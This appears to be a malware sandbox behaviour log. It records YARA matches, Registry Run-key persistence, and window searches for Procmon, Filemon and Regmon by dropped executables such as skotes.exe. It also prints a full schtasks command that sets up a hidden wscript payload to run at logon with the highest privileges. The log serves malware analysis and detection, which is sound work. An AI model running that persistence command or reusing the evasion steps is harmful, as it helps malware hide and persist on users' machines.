Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1e9cc73e62.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8fb472f3d3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1e9cc73e62.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1e9cc73e62.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8fb472f3d3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8fb472f3d3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009B26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 28_2_009B26DD
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0093FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 28_2_0093FC7C
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
